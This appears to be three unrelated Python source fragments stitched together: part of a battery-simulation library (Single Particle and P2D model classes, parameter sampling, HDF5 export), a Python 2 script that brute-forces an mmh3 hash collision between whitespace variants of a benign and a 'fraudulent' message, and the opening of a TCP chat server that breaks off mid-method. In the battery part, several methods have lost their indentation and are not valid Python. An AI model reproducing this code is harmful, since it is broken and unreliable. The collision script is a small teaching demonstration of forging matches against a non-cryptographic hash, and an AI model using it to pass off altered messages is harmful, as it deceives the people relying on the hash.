            self.raw_sample = cartesian([temp for i in range(len(self.generate_pars))])
        elif type == 'random':
            self.raw_sample = np.random.random((n,len(self.generate_pars)))
        assert self.raw_sample is not None, \
            'something went wrong - check that type is correct'
        print('expected shape is {}'.format(self.raw_sample.shape))
        # map the raw array to bounds, adhering to log scaling rules
        self.scaled_sample = self.log_scale_matrix(self.raw_sample)
        if just_sample:
            return [None, self.scaled_sample]
        else:
            outs = []
            ins = []
            self.failed=[]
            count = 0
            # solve every sampled parameter set at every requested current;
            # parameter sets that raise IndexError are recorded in self.failed
            for i in self.currents:
                for parameter_set in self.scaled_sample:
                    simulate_pars = np.copy(self.initial)
                    simulate_pars[self.generate_inds] = self.log_descale_for_model(parameter_set)
                    # print(simulate_pars)
                    try:
                        if i > 0:
                            outs.append(self.discharge(current=i, p=simulate_pars, internal=internal)[1])
                        else:
                            outs.append(self.charge(current=-1*i, p=simulate_pars, internal=internal)[1])
                        ins.append(self.log_descale_for_model(parameter_set))
                    except IndexError:
                        self.failed.append(simulate_pars)
                        # outs.append(self.)
                        # outs.append([])
        # # outs = np.zeros((self.generate_time.shape[0], time_samples))
        # # ins = np.zeros(self.generate_time.shape[0], len(self.generate_inds))
        # # print(self.scaled_sample)
        # # print(self.generate_time)
        # count = 0
        # st = time.time()
        # self.currents = sorted(self.currents)
        # self.failed = []
        # for parameter_set in self.scaled_sample:
        #     try:
        #         succ = 0
        #         # reverse the list because high currents tend to fail more frequently,
        #         # and we want it to fail first if it's going to fail.
        #         for i, curr in enumerate(self.currents[::-1]):
        #
        #             current_pars = np.copy(self.initial)
        #             current_pars[self.generate_inds] = self.log_descale_for_model(parameter_set)
        #             current_pars[self.curr_index] = curr
        #             # print(current_pars)
        #             outs[i].append(self.model(current_pars, self.generate_time[i]))
        #             succ += 1
        #         ins.append(parameter_set)
        #     except (ValueError, IndexError):
        #         # if self.verbose:
        #         #     print('failed - ', current_pars, count)
        #         self.failed.append([current_pars, count])
        #         if succ != 0:
        #             for i in range(succ):
        #                 outs[i].pop()
        #     count += 1
        #     if count == 20:
        #         print('{} solutions completed of {} in {} seconds - {} total hours predicted'.format(count, self.scaled_sample.shape[0], time.time()-st, (time.time()-st)/3600/(count/self.scaled_sample.shape[0])))
        #     if count % (self.scaled_sample.shape[0]//20) == 0 and self.verbose:
        #         print('{} solutions completed of {} in {} seconds - {} total hours predicted'.format(count, self.scaled_sample.shape[0], time.time()-st, (time.time()-st)/3600/(count/self.scaled_sample.shape[0])))
        #
        # # save the values to an h5 file
        # outs = [np.array(out) for out in outs]
        # ins = np.array(ins)
        # self.raw_outs = outs
        #
        # outs2 = []
        # for i in range(len(outs[0])):
        #     outs2.append([x[i] for x in outs])
        # outs2 = np.array(outs2)
        # outs = outs2.reshape(outs2.shape[0], -1)
        #
        # # break into test and train splits
        # inds = np.arange(outs.shape[0])
        # np.random.shuffle(inds)
        # train = inds[:outs.shape[0]*3//4]
        # test = inds[outs.shape[0]*3//4:]
        # #
        # x = outs[train]
        # xt = outs[test]
        # y = ins[train]
        # yt = ins[test]
        # self.outs = outs
        # self.ins = ins
        # self.create_database(x, y, xt, yt, filename)
        # if summary:
        #     print("""A total of {} parameter combinations were evaluated. Of
        #     these, {} failed, representing {} percent. These values can be
        #     found at object.failed""".format(len(self.scaled_sample), len(self.failed), len(self.failed)/len(self.scaled_sample)*100))
        return [outs, ins]
def create_database(self, x, y, xt, yt, filename):
"""This function creates a dataset using pre-split data and saves it
into a compressed h5 file with name filename. x, y, xt, yt are assumed
to be numpy arrays."""
import h5py
with h5py.File(filename+".hdf5", "w") as f:
f.create_dataset('x', data=x, compression='gzip')
f.create_dataset('xt', data=xt, compression='gzip')
f.create_dataset('y', data=y, compression='gzip')
f.create_dataset('yt', data=yt, compression='gzip')
return
def abscale(self, matrix, a=-1, b=1):
out = 0
if matrix.shape == (matrix.shape[0],):
matrix = matrix.reshape(-1, 1)
out = 1
new = np.zeros(matrix.shape)
for i in range(matrix.shape[1]):
new[:, i] = (b-a)*(matrix[:, i]-matrix[:, i].min())/(matrix[:, i].max()-matrix[:, i].min())+a
if out == 0:
return new
else:
return new[:, 0]
def log_scale_matrix(self, matrix):
"""This function is used to resample the sampling methods into log
space, if the value in loglist is a 1."""
out = np.zeros(matrix.shape)
for i in range(len(self.loglist)):
if self.loglist[i] == 1:
ub = np.log(self.bounds[i][1])
lb = np.log(self.bounds[i][0])
out[:, i] = self.abscale(matrix[:, i], ub, lb)
else:
ub = self.bounds[i][1]
lb = self.bounds[i][0]
out[:, i] = self.abscale(matrix[:, i], ub, lb)
return out
def log_descale_for_model(self, matrix):
"""This function takes in a matrix that has been log scaled and
turns the log values back into normal values to pass to the model."""
out = np.zeros(matrix.shape)
for i in range(len(self.loglist)):
if self.loglist[i] == 1:
out[i] = np.exp(matrix[i])
else:
out[i] = matrix[i]
return out
    def demonstrate_convergence(self, function):
        '''This function seeks to demonstrate grid independence for the given
        charge / discharge pattern. It will continue doubling the number of nodes
        in each region until the absolute error between subsequent discharges is less than 1e-6,
        giving an error if that does not occur.
        Parameters
        ----------
        function: A string describing the desired test
        Outputs
        -------
        Error as a function of nodes, as well as the minimum number of nodes needed
        for grid independence, or numerical convergence, at these conditions.

        NOTE(review): this is an unfinished stub - `function` is never used,
        self.errors is never populated, and no solves are run; only a list of
        candidate node counts is built. Complete or remove before relying on it.
        '''
        # node counts assumed to live at positions 25+ of the parameter
        # vector (matches the P2D layout) - TODO confirm for other models
        self.initial_discretization = self.initial[25:]
        self.nodes = []
        self.errors = []
        print(self.initial_discretization)
        # candidate refinements: 1x through 9x the initial discretization
        for i in range(1,10):
            self.nodes.append(self.initial_discretization*i)
class SingleParticleParabolic(BaseBattery):
    """An implementation of the Single Particle Model, solved with IDA. This
    version supports CC-discharge, CC-CV charging, and access to the internal
    states of the battery. It also allows for sequential cycling. """
    def __init__(self, initial_parameters=None, verbose=False, **kwargs):
        """Constructor for the Single Particle Model base class
        Parameters
        ----------
        initial_parameters: A dictionary of parameter names and values. Acceptable names for the
        parameters can be found below:
        | name | description | default value | Units |
        |--------|---------------------------------------------|---------------|-----------------|
        | Dn | Li+ Diffusivity in negative particle | 3.9e-14 | cm^2/s |
        | Dp | Li+ Diffusivity in positive particle | 1e-14 | cm^2/s |
        | Rn | Negative particle radius | 2e-6 | m |
        | Rp | Positive particle radius | 2e-6 | m |
        | T | Ambient Temperature | 303.15 | K |
        | an | Surface area of negative electrode | 723600 | m^2/m^3 |
        | ap | Surface area of positive electrode | 885000 | m^2/m^3 |
        | ce | Starting electrolyte Li+ concentration | 1000 | mol/m^3 |
        | csnmax | Maximum Li+ concentration of negative solid | 30555 | mol/m^3 |
        | cspmax | Maximum Li+ concentration of positive solid | 51555 | mol/m^3 |
        | kn | Negative electrode reaction rate | 5.0307e-9 |m^2.5/(mol^0.5s) |
        | kp | Positive electrode reaction rate | 2.334e-9 |m^2.5/(mol^0.5s) |
        | ln | Negative electrode thickness | 88e-6 | m |
        | lp | Positive electrode thickness | 80e-6 | m |
        estimate_parameters: A list of strings representing the parameters that you wish to estimate.
        Defaults to None, which will allow for the estimation of all parameters except temperature.
        For both initial_parameters and estimate_parameters, order does not matter.
        Example usage:
        spm = SingleParticle(initial_parameters=dictionary_of_parameter_label_value_pairs, est_pars=list_of_parameter_labels)
        A list of available keyword arguments (kwargs):
        """
        from .numerical import SPM_par
        from .fitting import rmse
        super().__init__(initial_parameters, **kwargs)
        self.model = SPM_par
        self.opt = self.opt_wrap
        self.verbose = verbose
        self.initial_fit = 0
        # self.inplace = np.zeros((10000,8))
        # canonical parameter order expected by the numerical model
        self.available_parameters = ['Dn','Dp','Rn','Rp','T','an','ap','ce','csnmax','cspmax','kn','kp','ln','lp']
        # NOTE(review): csnmax default here is 30550 but the table above says
        # 30555 - confirm which value is correct.
        self.default_values = [3.9e-14, 1e-14, 2e-6, 2e-6, 303.15, 723600, 885000, 1000, 30550, 51555, 5.0307e-9, 2.334e-9, 88e-6, 80e-6]
        self.initial_parameters = dict(zip(self.available_parameters, self.default_values))
        if initial_parameters is not None:
            # reject any unknown parameter names before applying overrides
            for key in initial_parameters.keys():
                assert set({key}).issubset(self.initial_parameters.keys()),\
                    "Invalid initial key entered - double check %s" % str(key)
            for key in initial_parameters.keys():
                self.initial_parameters[key] = initial_parameters[key]
        # initial enforces the order parameters are given to the model
        self.initial = np.array([self.initial_parameters[i] for i in self.available_parameters])
        if self.estimate_parameters is not None:
            for key in self.estimate_parameters:
                assert set({key}).issubset(self.initial_parameters.keys()),\
                    "Invalid estimate key entered - double check %s" % str(key)
            # indices (into self.initial) of the parameters being estimated
            self.estimate_inds = [i for i, p in enumerate(self.available_parameters) if p in self.estimate_parameters]
            if self.verbose:
                print(self.estimate_parameters, self.estimate_inds)
        else:
            # no selection given: estimate every parameter
            self.estimate_inds = list(range(len(self.initial)))
            if self.verbose:
                print(self.estimate_parameters, self.estimate_inds)
        # initial condition vectors for the DAE solver (fully charged /
        # fully discharged starting states)
        self.charge_ICs = [4.95030611e+04, 3.05605527e+02, 4.93273985e+04, 3.55685791e+02, 3.78436346e+00, 7.86330739e-01, 1.00000000e+00]
        self.discharge_ICs = [2.51584754e+04, 2.73734963e+04, 2.51409091e+04, 2.73785043e+04, 4.26705391e+00, 6.70539113e-02, -1.00000000]
        # history of completed solves (appended to elsewhere)
        self.hist = []
class SingleParticleFDSEI(BaseBattery):
    """A Finite Difference implementation of the Single Particle Model with SEI, solved with IDA. This
    version supports CC-discharge, CC-CV charging, and access to the internal
    states of the battery. It also allows for sequential cycling. See .charge, .discharge,
    .cycle, and .piecewise_current for more."""
    def __init__(self, initial_parameters=None, verbose=False, **kwargs):
        """Constructor for the Single Particle Model base class
        Parameters
        ----------
        initial_parameters: A dictionary of parameter names and values. Acceptable names for the
        parameters can be found below:
        | name | description | default value | Units |
        |-----------|-----------------------------------------------|---------------|------------------|
        | Dp | Li+ Diffusivity in positive particle | 3.9e-14 | cm^2/s |
        | Dn | Li+ Diffusivity in negative particle | 3.9e-14 | cm^2/s |
        | cspmax | Maximum Li concentration of positive solid | 30555 | mol/m^3 |
        | csnmax | Maximum Li concentration of negative solid | 30555 | mol/m^3 |
        | lp | Positive electrode thickness | 80e-6 | m |
        | ln | Negative electrode thickness | 88e-6 | m |
        | Rp | Positive particle radius | 2e-6 | m |
        | Rn | Negative particle radius | 2e-6 | m |
        | T | Ambient Temperature | 303.15 | K |
        | ce | Starting electrolyte Li+ concentration | 1000 | mol/m^3 |
        | ap | Surface area of positive electrode per volume | 885000 | m^2/m^3 |
        | an | Surface area of negative electrode per volume | 723600 | m^2/m^3 |
        | M_sei | Molecular weight of SEI | 0.026 | Kg/mol |
        | rho_sei | SEI Density | 2.1e3 | Kg/m^3 |
        | Kappa_sei | SEI Ionic conductivity | 1 | S/m |
        | ksei | rate constant of side reaction | 1.5e-6 | C m/(mol*s) |
        | kp | Positive electrode reaction rate | 2.334e-9 | m^2.5/(mol^0.5s) |
        | kn | Negative electrode reaction rate | 5.0307e-9 | m^2.5/(mol^0.5s) |
        | N1 | Number of FD nodes in positive particle | 15 | |
        | N2 | Number of FD nodes in negative particle | 15 | |
        estimate_parameters: A list of strings representing the parameters that you wish to estimate.
        Defaults to None, which will allow for the estimation of all parameters except temperature.
        For both initial_parameters and estimate_parameters, order does not matter.
        Example usage:
        spm = SingleParticle(initial_parameters=dictionary_of_parameter_label_value_pairs, est_pars=list_of_parameter_labels)
        A list of available keyword arguments (kwargs):
        """
        from .numerical import SPM_fd_sei
        from .fitting import rmse
        super().__init__(initial_parameters, **kwargs)
        self.model = SPM_fd_sei
        self.opt = self.opt_wrap
        self.verbose = verbose
        self.initial_fit = 0
        # TC: applied current magnitude used to seed the 'it' initial condition
        TC = 30
        # self.inplace = np.zeros((10000,8))
        # canonical parameter order expected by the numerical model;
        # note the accepted key is 'ksei' (the docstring table previously
        # listed it as 'k_sei')
        self.available_parameters = ['Dp','Dn','cspmax','csnmax','lp','ln','Rp','Rn','T','ce','ap','an','M_sei','rho_sei','Kappa_sei','kp','kn','ksei','N1','N2']
        self.default_values = [1e-14, 1e-14, 51555.0, 30555.0, 8e-05, 8.8e-05, 2e-06, 2e-06, 303.15, 1000.0, 885000.0, 723600.0, 0.026, 2100.0, 1.0, 2.334e-11, 8.307e-12, 1.5e-06, 30, 30]
        self.initial_parameters = dict(zip(self.available_parameters, self.default_values))
        if initial_parameters is not None:
            # reject any unknown parameter names before applying overrides
            for key in initial_parameters.keys():
                assert set({key}).issubset(self.initial_parameters.keys()),\
                    "Invalid initial key entered - double check %s" % str(key)
            for key in initial_parameters.keys():
                self.initial_parameters[key] = initial_parameters[key]
        # initial enforces the order parameters are given to the model
        self.initial = np.array([self.initial_parameters[i] for i in self.available_parameters])
        if self.estimate_parameters is not None:
            for key in self.estimate_parameters:
                assert set({key}).issubset(self.initial_parameters.keys()),\
                    "Invalid estimate key entered - double check %s" % str(key)
            self.estimate_inds = [i for i, p in enumerate(self.available_parameters) if p in self.estimate_parameters]
            if self.verbose:
                print(self.estimate_parameters, self.estimate_inds)
        else:
            self.estimate_inds = list(range(len(self.initial)))
            if self.verbose:
                print(self.estimate_parameters, self.estimate_inds)
        # build the charge initial-condition vector: solid concentrations at
        # every FD node for both particles, then the algebraic states
        self.charge_ICs = []
        N1 = int(self.initial[18])  # positive-particle node count ('N1')
        N2 = int(self.initial[19])  # negative-particle node count ('N2')
        for i in range(N1+2):
            self.charge_ICs.append(49503.111)
        for i in range(N1+2, N1+N2+4):
            self.charge_ICs.append(305.55)
        self.charge_ICs.append(3.67873289259766) #phi_p
        self.charge_ICs.append(.182763748093840) #phi_n
        self.charge_ICs.append(30) #iint
        self.charge_ICs.append(0) #isei
        self.charge_ICs.append(1e-10) #delta_sei
        self.charge_ICs.append(0) #Q
        self.charge_ICs.append(0) #cm
        self.charge_ICs.append(0) #cf
        self.charge_ICs.append(3.0596914450382) #pot
        self.charge_ICs.append(TC*1) #it
        # self.charge_ICs = [4.95030611e+04, 3.05605527e+02, 4.93273985e+04, 3.55685791e+02, 3.78436346e+00, 7.86330739e-01, 1.00000000e+00]
        # discharge initial-condition vector, same layout as charge_ICs
        self.discharge_ICs=[]
        for i in range(N1+2):
            self.discharge_ICs.append(2.51417672e+04)
        for i in range(N1+2, N1+N2+4):
            self.discharge_ICs.append(2.73921225e+04)
        self.discharge_ICs.append(4.26700382e+00)
        self.discharge_ICs.append(6.70038247e-02)
        self.discharge_ICs.append(2.65295200e-03)
        self.discharge_ICs.append(7.34704800e-03)
        self.discharge_ICs.append(1.63513920e-10)
        self.discharge_ICs.append(3.08271510e+01)
        self.discharge_ICs.append(3.08183958e+01)
        self.discharge_ICs.append(8.75512593e-03)
        self.discharge_ICs.append(4.20000000e+00)
        self.discharge_ICs.append(1.00000000e-02)
        # self.discharge_ICs = [2.51584754e+04, 2.73734963e+04, 2.51409091e+04, 2.73785043e+04, 4.26705391e+00, 6.70539113e-02, -1.00000000]
        # history of completed solves (appended to elsewhere)
        self.hist = []
class SingleParticleFD(BaseBattery):
    """A Finite Difference implementation of the Single Particle Model
    (this variant has no SEI parameters), solved with IDA. This
    version supports CC-discharge, CC-CV charging, and access to the internal
    states of the battery. It also allows for sequential cycling. See .charge, .discharge,
    .cycle, and .piecewise_current for more."""
    def __init__(self, initial_parameters=None, verbose=False, **kwargs):
        """Constructor for the Single Particle Model base class
        Parameters
        ----------
        initial_parameters: A dictionary of parameter names and values. Acceptable names for the
        parameters can be found below:
        | name | description | default value | Units |
        |-----------|-----------------------------------------------|---------------|------------------|
        | Dp | Li+ Diffusivity in positive particle | 3.9e-14 | cm^2/s |
        | Dn | Li+ Diffusivity in negative particle | 3.9e-14 | cm^2/s |
        | cspmax | Maximum Li concentration of positive solid | 30555 | mol/m^3 |
        | csnmax | Maximum Li concentration of negative solid | 30555 | mol/m^3 |
        | lp | Positive electrode thickness | 80e-6 | m |
        | ln | Negative electrode thickness | 88e-6 | m |
        | Rp | Positive particle radius | 2e-6 | m |
        | Rn | Negative particle radius | 2e-6 | m |
        | T | Ambient Temperature | 303.15 | K |
        | ce | Starting electrolyte Li+ concentration | 1000 | mol/m^3 |
        | ap | Surface area of positive electrode per volume | 885000 | m^2/m^3 |
        | an | Surface area of negative electrode per volume | 723600 | m^2/m^3 |
        | kp | Positive electrode reaction rate | 2.334e-9 | m^2.5/(mol^0.5s) |
        | kn | Negative electrode reaction rate | 5.0307e-9 | m^2.5/(mol^0.5s) |
        | N1 | Number of FD nodes in positive particle | 15 | |
        | N2 | Number of FD nodes in negative particle | 15 | |
        estimate_parameters: A list of strings representing the parameters that you wish to estimate.
        Defaults to None, which will allow for the estimation of all parameters except temperature.
        For both initial_parameters and estimate_parameters, order does not matter.
        Example usage:
        spm = SingleParticle(initial_parameters=dictionary_of_parameter_label_value_pairs, est_pars=list_of_parameter_labels)
        A list of available keyword arguments (kwargs):
        """
        from .numerical import SPM_fd
        from .fitting import rmse
        super().__init__(initial_parameters, **kwargs)
        self.model = SPM_fd
        self.opt = self.opt_wrap
        self.verbose = verbose
        self.initial_fit = 0
        # TC: applied current magnitude used to seed the 'it' initial condition
        TC = 30
        # self.inplace = np.zeros((10000,8))
        # canonical parameter order expected by the numerical model
        self.available_parameters = ['Dp','Dn','cspmax','csnmax','lp','ln','Rp','Rn','T','ce','ap','an','kp','kn','N1','N2']
        self.default_values = [1e-14, 1e-14, 51555.0, 30555.0, 8e-05, 8.8e-05, 2e-06, 2e-06, 303.15, 1000.0, 885000.0, 723600.0, 2.334e-11, 8.307e-12, 30, 30]
        self.initial_parameters = dict(zip(self.available_parameters, self.default_values))
        if initial_parameters is not None:
            # reject any unknown parameter names before applying overrides
            for key in initial_parameters.keys():
                assert set({key}).issubset(self.initial_parameters.keys()),\
                    "Invalid initial key entered - double check %s" % str(key)
            for key in initial_parameters.keys():
                self.initial_parameters[key] = initial_parameters[key]
        # initial enforces the order parameters are given to the model
        self.initial = np.array([self.initial_parameters[i] for i in self.available_parameters])
        if self.estimate_parameters is not None:
            for key in self.estimate_parameters:
                assert set({key}).issubset(self.initial_parameters.keys()),\
                    "Invalid estimate key entered - double check %s" % str(key)
            self.estimate_inds = [i for i, p in enumerate(self.available_parameters) if p in self.estimate_parameters]
            if self.verbose:
                print(self.estimate_parameters, self.estimate_inds)
        else:
            self.estimate_inds = list(range(len(self.initial)))
            if self.verbose:
                print(self.estimate_parameters, self.estimate_inds)
        # build the charge initial-condition vector: solid concentrations at
        # every FD node for both particles, then the algebraic states
        self.charge_ICs = []
        N1 = int(self.initial[14])  # positive-particle node count ('N1')
        N2 = int(self.initial[15])  # negative-particle node count ('N2')
        for i in range(N1+2):
            self.charge_ICs.append(49503.111)
        for i in range(N1+2, N1+N2+4):
            self.charge_ICs.append(305.55)
        self.charge_ICs.append(3.67873289259766) #phi_p
        self.charge_ICs.append(.182763748093840) #phi_n
        self.charge_ICs.append(3.0596914450382) #pot
        self.charge_ICs.append(TC*1) #it
        # self.charge_ICs = [4.95030611e+04, 3.05605527e+02, 4.93273985e+04, 3.55685791e+02, 3.78436346e+00, 7.86330739e-01, 1.00000000e+00]
        # discharge initial-condition vector, same layout as charge_ICs
        self.discharge_ICs=[]
        for i in range(N1+2):
            self.discharge_ICs.append(25817.37)
        for i in range(N1+2, N1+N2+4):
            self.discharge_ICs.append(26885.03)
        self.discharge_ICs.append(4.246347)
        self.discharge_ICs.append(0.046347)
        self.discharge_ICs.append(4.20000000e+00)
        self.discharge_ICs.append(1.00000000e-02)
        # self.discharge_ICs = [2.51584754e+04, 2.73734963e+04, 2.51409091e+04, 2.73785043e+04, 4.26705391e+00, 6.70539113e-02, -1.00000000]
        # history of completed solves (appended to elsewhere)
        self.hist = []
class PseudoTwoDimFD(BaseBattery):
    """A Finite Difference implementation of the Pseudo-Two-Dimensional (P2D)
    model, solved with IDA. This version supports CC-discharge, CC-CV
    charging, and access to the internal states of the battery. It also
    allows for sequential cycling. See .charge, .discharge,
    .cycle, and .piecewise_current for more."""
    def __init__(self, initial_parameters=None, verbose=False, **kwargs):
        """Constructor for the Pseudo-Two-Dimensional model class
        Parameters
        ----------
        initial_parameters: A dictionary of parameter names and values.
        Accepted keys (see self.available_parameters for the full ordered
        list): diffusivities D1/Dsn/Dsp, particle radii Rpn/Rpp, temperature
        Temp, Bruggeman coefficients brugn/brugp/brugs, concentrations
        c0/ctn/ctp, filler/porosity fractions efn/efp/en/ep/es, reaction
        rates kn/kp, thicknesses ln/lp/ls, conductivities sigman/sigmap,
        transference number t1, and node counts N1/N2/N3/Nr1/Nr2.
        NOTE(review): the table in the SPM classes does not apply here; the
        defaults below are the authoritative values for this class.
        estimate_parameters: A list of strings representing the parameters that you wish to estimate.
        Defaults to None, which will allow for the estimation of all parameters except temperature.
        For both initial_parameters and estimate_parameters, order does not matter.
        Example usage:
        p2d = PseudoTwoDimFD(initial_parameters=dictionary_of_parameter_label_value_pairs, est_pars=list_of_parameter_labels)
        A list of available keyword arguments (kwargs):
        """
        from .numerical import P2D_fd
        from .fitting import rmse
        super().__init__(initial_parameters, **kwargs)
        self.model = P2D_fd
        self.opt = self.opt_wrap
        self.verbose = verbose
        self.initial_fit = 0
        # flag consumed elsewhere: this model carries discretization counts
        self.discretized = True
        # TC = 30
        # self.inplace = np.zeros((10000,8))
        # canonical parameter order expected by the numerical model
        self.available_parameters = ['D1','Dsn','Dsp','Rpn','Rpp','Temp','brugn','brugp','brugs','c0','ctn','ctp','efn','efp','en','ep','es','kn','kp','ln','lp','ls','sigman','sigmap','t1','N1','N2','N3','Nr1','Nr2']
        self.default_values = [.15e-8, .72e-13, .75e-13, .10e-4, .8e-5, 298.15, 1.5, 1.5, 1.5, 1200, 30555, 45829., .3260e-1,.025, .38, .4, .45, .10307e-9, .1334e-9, .465e-4, .43e-4, .16e-4, 100, 10, .363, 7, 3, 7, 3, 3]
        self.initial_parameters = dict(zip(self.available_parameters, self.default_values))
        if initial_parameters is not None:
            # reject any unknown parameter names before applying overrides
            for key in initial_parameters.keys():
                assert set({key}).issubset(self.initial_parameters.keys()),\
                    "Invalid initial key entered - double check %s" % str(key)
            for key in initial_parameters.keys():
                self.initial_parameters[key] = initial_parameters[key]
        # initial enforces the order parameters are given to the model
        self.initial = np.array([self.initial_parameters[i] for i in self.available_parameters])
        if self.estimate_parameters is not None:
            for key in self.estimate_parameters:
                assert set({key}).issubset(self.initial_parameters.keys()),\
                    "Invalid estimate key entered - double check %s" % str(key)
            self.estimate_inds = [i for i, p in enumerate(self.available_parameters) if p in self.estimate_parameters]
            if self.verbose:
                print(self.estimate_parameters, self.estimate_inds)
        else:
            self.estimate_inds = list(range(len(self.initial)))
            if self.verbose:
                print(self.estimate_parameters, self.estimate_inds)
        # spatial node counts: N1/N2/N3 across the electrodes/separator,
        # Nr1/Nr2 radially within the particles
        N1 = int(self.initial[25])
        N2 = int(self.initial[26])
        N3 = int(self.initial[27])
        Nr1 = int(self.initial[28])
        Nr2 = int(self.initial[29])
        # charge initial conditions: electrolyte concentration, potential
        # profiles, then solid concentrations per region and terminal states
        self.charge_ICs = []
        for i in range(N1+N2+N3+4):
            self.charge_ICs.append(1.0)
        for i in range(N1+N2+N3+3):
            self.charge_ICs.append(-.787E-2+.03E-2*i)
        self.charge_ICs.append(0.0)
        for i in range(N1+2):
            self.charge_ICs.append(2.899)
        for i in range(N3+2):
            self.charge_ICs.append(0.09902)
        for i in range(N3*(Nr2+1)):
            self.charge_ICs.append(0.22800075826244027)
        for i in range(N3):
            self.charge_ICs.append(0.21325933957011173)
        for i in range(N1*(Nr1+1)):
            self.charge_ICs.append(0.9532086891149233)
        for i in range(N1):
            self.charge_ICs.append(0.9780166774057617)
        self.charge_ICs.append(2.8)
        self.charge_ICs.append(-17.1)
        # initialize the discharge ICs (same layout as charge_ICs)
        self.discharge_ICs = []
        for i in range(N1+N2+N3+4):
            self.discharge_ICs.append(0.99998+2e-6*i)
        for i in range(N1+N2+N3+3):
            self.discharge_ICs.append(-.3447E-2+.01E-2*i)
        self.discharge_ICs.append(0.0)
        for i in range(N1+2):
            self.discharge_ICs.append(0.422461225901562E1)
        for i in range(N3+2):
            self.discharge_ICs.append(0.822991162960124E-1)
        for i in range(N3*(Nr2+1)):
            self.discharge_ICs.append(0.986699999999968)
        for i in range(N3):
            self.discharge_ICs.append(0.977101677061948)
        for i in range(N1*(Nr1+1)):
            self.discharge_ICs.append(0.424)
        for i in range(N1):
            self.discharge_ICs.append(0.431)
        self.discharge_ICs.append(4.2)
        self.discharge_ICs.append(-17.1)
        # history of completed solves (appended to elsewhere)
        self.hist = []
|
import mmh3
import sys
def add_one_to_each(item, queue, big_list):
    """For each position in *item*, record a copy with that position bumped by one.

    Each copy goes onto both *queue* (pending BFS work) and *big_list*
    (every variation produced so far); *item* itself is left unchanged.
    """
    for idx in range(len(item)):
        item[idx] += 1
        queue.append(list(item))
        big_list.append(list(item))
        item[idx] -= 1
def generate_variations(message, m_list, num_variations):
    """Build at least num_variations spacing-variants of *message*.

    Each variant keeps the same words but varies the number of spaces
    before each word; a BFS over "space count" vectors generates them.
    NOTE(review): the m_list argument is immediately overwritten below,
    so the value passed in is never used -- confirm before removing it.
    """
    split_list = message.split()
    queue = []
    big_list = []
    # One entry per word: how many spaces to put before that word.
    m_list = [1] * len(split_list)
    queue.append(m_list)
    big_list.append(m_list)
    # Breadth-first: pop a vector, emit every one-step increment of it.
    while(len(big_list) < num_variations):
        add_one_to_each(queue.pop(0), queue, big_list)
    print "finished generating variations!"
    print "compiling messages:"
    word_list = []
    for i in range(0, len(big_list)):
        msg = ""
        # Progress report every 500k messages.
        if i % 500000 == 0 and i > 0:
            print "compiled", i, "messages"
        for j in range(0, len(big_list[i])):
            # big_list[i][j] spaces, then the j-th word.
            msg += big_list[i][j] * " "
            msg += split_list[j]
        word_list.append(msg)
    print "finished compiling", num_variations, "messages"
    return word_list
# Demo: look for an mmh3 (32-bit) collision between whitespace-variants of
# two different messages -- a birthday-style attack on a non-crypto hash.
# Usage: python script.py NUM_VARIATIONS
message1 = "More efficient attacks are possible by employing cryptanalysis to specific hash functions. When a collision attack is discovered and is found to be faster than a birthday attack, a hash function is often denounced as \"broken\". The NIST hash function competition was largely induced by published collision attacks against two very commonly used hash functions, MD5 and SHA-1. The collision attacks against MD5 have improved so much that, as of 2007, it takes just a few seconds on a regular computer. Hash collisions created this way are usually constant length and largely unstructured, so cannot directly be applied to attack widespread document formats or protocols."
message2 = "This is a fraudulent message. This is a fraudulent message. This is a fraudulent message."
m_list1 = []
m_list2 = []
print "MESSAGE 1 IS:", message1
print ""
print "generating variations of message 1..."
word_list_1 = generate_variations(message1, m_list1, int(sys.argv[1]))
print ""
print "MESSAGE 2 IS:", message2
print ""
print "generating variations of message 2..."
word_list_2 = generate_variations(message2, m_list2, int(sys.argv[1]))
print "\ncomparing hashes..."
# Map hash -> index for the message-1 variants, then probe with message-2 hashes.
hashes = {}
for i in range(0, len(word_list_1)):
    h = mmh3.hash(word_list_1[i])
    hashes[str(h)] = i
for i in range(0, len(word_list_2)):
    h = mmh3.hash(word_list_2[i])
    if str(h) in hashes:
        print "\nCOLLISION FOUND!!!\n"
        print "MESSAGE:", "\"" + word_list_1[hashes[str(h)]] + "\""
        print "HASH:", mmh3.hash(word_list_1[hashes[str(h)]])
        print ""
        print "MESSAGE:", "\"" + word_list_2[i] + "\""
        print "HASH:", mmh3.hash(word_list_2[i])
        exit()
print "NO COLLISION FOUND"
|
import select
import socket
from threading import Thread
from authenticate import Authenticate
from connection import Connection
from connection_state import ConnectionState
from connections import Connections
from const import Consts
from protocol import ProtoLogin, ProtoBroadcast
from user import User
from users import Users
class Server(object):
    """TCP chat server: accepts clients, authenticates them, and relays
    broadcast messages between authenticated connections."""

    def __init__(self, ip, port):
        """Bind a reusable listening socket and set up user/connection state."""
        self.ip = ip
        self.port = port
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server.bind((self.ip, self.port))
        self.server.listen(Consts.MAX_SERVER_LISTEN)
        self.thread_accept = None
        self.thread_data = None
        self.thread_manage = None
        self.users = Users(default_initialization=True)
        self.authenticate = Authenticate(self.users)
        self.connections = Connections()
        # [1,2,3,4,5,6,7,8,9,10] (O(n))
        # {'1': 1, ... , '9': 9 } (O(1))

    def start(self):
        """Spin up accept/data/management threads; block on the management
        thread and terminate the process when it returns."""
        thread_accept = Thread(target=self._handle_accept)
        thread_accept.start()
        thread_data = Thread(target=self._handle_data)
        thread_data.start()
        thread_manage = Thread(target=self._handle_manage)
        thread_manage.start()
        thread_manage.join()
        print('Exit unimplemented')
        exit(1)

    def _connection_login(self, msg, origin):
        """Handle a login message: authenticate and move the connection
        to BROADCAST state on success ('1' reply) or reject ('0')."""
        # TODO: validate this is a valid json
        login = ProtoLogin.from_json(msg)
        if not hasattr(login, 'username'):
            # TODO: or maybe just send a regular json response
            origin.send(b'0')
            return
        if not hasattr(login, 'password'):
            # TODO: or maybe just send a regular json response
            origin.send(b'0')
            return
        user = self.authenticate.authenticate(login.username, login.password)
        if isinstance(user, User):
            origin.state = ConnectionState.BROADCAST
            origin.user = user
            # TODO: refactor later (maybe use status_codes.py)
            # TODO: or maybe just send a regular json response
            origin.send(b'1')
        else:
            origin.send(b'0')

    def _connection_broadcast(self, msg, origin):
        """Relay a broadcast message to every other connection, but only
        when the claimed username matches the authenticated sender."""
        broadcast = ProtoBroadcast.from_json(msg)
        if not hasattr(broadcast, 'username'):
            # TODO: or maybe just send a regular json response
            origin.send(b'0')
            return
        if not hasattr(broadcast, 'content'):
            # TODO: or maybe just send a regular json response
